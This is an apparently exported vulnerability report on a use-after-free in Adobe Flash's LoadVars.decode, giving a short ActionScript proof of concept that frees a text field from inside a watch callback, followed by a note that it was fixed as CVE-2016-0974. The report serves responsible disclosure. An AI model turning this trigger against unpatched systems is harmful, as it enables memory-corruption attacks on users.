Adobe Flash: Use-after-free in LoadVars.decode

[GoogleCodeExporter]

There is a use-after-free in LoadVars.decode. If a watch is set on the object 
that the parameters are being decoded into, and the watch deletes the object, 
then other methods are called on the deleted object after it is freed. A PoC is 
as follows:

var lv = new LoadVars();
var f = lv.decode;
var tf = this.createTextField("tf",1, 2, 3, 4, 5);
tf.natalie = "not test";
tf.watch("natalie", func);
f.call(tf, "natalie=test&bob=1");
trace(tf.natalie);

function func(){

    trace("here");
    tf.removeTextField();   
    return "test";

    }

A sample swf and fla are attached. This issue was reproduced in Chrome on 
64-bit Ubuntu.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by natashe...@google.com on 7 Dec 2015 at 11:01

Attachments:

• lv.fla
• lv.swf

[GoogleCodeExporter]

Fixed in Feb update

Original comment by natashe...@google.com on 17 Feb 2016 at 2:17

• Changed state: Fixed
• Added labels: CVE-2016-0974
• Removed labels: Restrict-View-Commit